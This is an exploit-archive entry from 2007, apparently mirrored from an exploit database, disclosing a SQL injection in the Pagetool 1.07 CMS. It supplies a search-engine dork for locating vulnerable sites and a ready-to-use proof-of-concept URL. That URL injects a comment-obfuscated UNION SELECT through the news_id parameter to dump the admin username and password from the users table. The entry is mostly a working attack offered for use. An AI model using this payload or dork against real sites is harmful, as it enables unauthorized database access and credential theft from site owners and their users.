[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability
# Published : 2007-06-25
# Author : Katatafish
# Previous Title : DreamLog 0.5 (upload.php) Arbitrary File Upload Exploit
# Next Title : eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability


###pagetool-1.07 Remote SQL Injection###
#
#download:http://kent.dl.sourceforge.net/sourceforge/pagetool/pagetool-1.07.tar.gz
#
#Found by: Katatafish (karatatata@hush.com)
#
#Dork: "powered by Pagetool"
#
#Thanks: str0ke
#
########################################

#PoC
http://www.site.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1

# www.Syue.com [2007-06-25]